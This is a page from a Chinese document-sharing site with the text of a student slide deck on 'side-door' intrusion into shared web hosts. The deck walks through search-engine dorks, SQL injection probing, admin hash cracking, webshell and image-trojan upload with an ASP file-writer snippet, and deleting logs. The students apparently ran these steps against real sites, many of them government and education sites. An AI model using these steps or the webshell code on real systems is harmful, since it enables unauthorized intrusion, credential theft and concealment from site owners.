• / 20
  • 下载费用:5 金币  

17旁注技术.pptx

关 键 词:
17 旁注 技术
资源描述:
旁注技术分析及实验,成员:王嘉春 2015140233姚凯 2015140234 李通 2015140235 陈义璟 2015140237,旁注简介:,旁注是互联网黑客入侵常见的一种手段,多数用来攻击虚拟主机。其原理是利用同一主机上其他站点的安全漏洞获取服务器上的一个webshell(web后门程序),从而获取一定的服务器操作权限,进而利用虚拟目录权限的配置不严格或者“提权”攻击获取管理员权限后在跳转到目标网站的web虚拟目录中。,旁注简介:,网络拓扑:,旁注简介:,同一个服务器的IP地址是固定的,主机S通常会注册管理众多的域名,通过WHOIS反查可以得到与要攻击的网站A处于同一服务器的其他网站的域名,以此决定下一步的攻击目标。,旁注简介:,实验工具:,网站工具:http://www.aizhan.com/注入点扫描:御剑 1.5注入测试:Domain 4.3BSQL hacker 0909脚本上传:中国菜刀,实验步骤:,通过注入点扫描收集可以进行注入的网站集入侵傀儡网站B上传木马,拿到服务器S的部分权限进入本次攻击的目标网站A,实施攻击清理入侵痕迹,删除日志文件,实验过程:,收集可入侵网站使用搜索引擎(百度,bing,google)查询 Inurl:asp?id= 找到有可能用来注入的.asp或.php网站类似查询语句还有很多,实验过程:,扫描注入点在url后输入:and 1=1网页正常显示and 1=2网页出错说明这个网站可以注入本次收集到700个网站可注入地址145个,实验过程,扫描注入点手工验证是否可以注入,实验过程:,注入检测猜解表名,列名猜解后台管理员账号密码“猜”的过程需要一些运气,实验过程:,密码破解网站密码一般都会加密,以MD5居多,还有SHA-1、DES、CRC等破解密码的网站http://www.cmd5.com/(收费)http://www.xmd5.org/···· ···,实验过程:,获取网站后台管理入口后台地址也是用自己的地址库去匹配,实验过程:,登录后台管理系统,实验过程:,上传木马,实验过程:,图片木马制作新建一个1.asp,输入准备一张图片1.jpg运行cmd,生成图片木马a:ASKII码文件b:二进制文件,实验过程:,图片木马制作,实验过程:,服务器提权 set lP=server.createObject("Adodb.Stream")lP.Open lP.Type=2 //以文本方式 lP.CharSet="gb2312" lP.writetext request("newvalue") lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asplP.Closeset lP=nothing response.redirect "newmm.asp" 添入生成木马的内容 ,实验过程:,进入目标网站A的组织目录获取所需信息不要随意修改别人的网站清理浏览痕迹,总结与反思:,实验中收集的傀儡网站大抵以政府机关,教育机构居多,真切希望国家能够在公共事业中做的更细致一些。平时在学习和工作之余,多接触一些网站研发和运行的机制,以及各种关系型数据库的结构和SQL查询语句的使用,及时更新自己的资料库。使用各种漏洞监测软件的过程中,杀毒软件会报毒,无奈只能关闭,因此也增加了PC中毒的风险。许多java命令和脚本语言还看不懂,只能借助于工具实现简单的应用,以后要多看源码,自己分析。,
展开阅读全文
1
  金牌文库所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
0条评论

还可以输入200字符

暂无评论,赶快抢占沙发吧。

关于本文
本文标题:17旁注技术.pptx
链接地址:http://www.gold-doc.com/p-256879.html
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服客服 - 联系我们
copyright@ 2014-2018 金牌文库网站版权所有
经营许可证编号:浙ICP备15046084号-3
收起
展开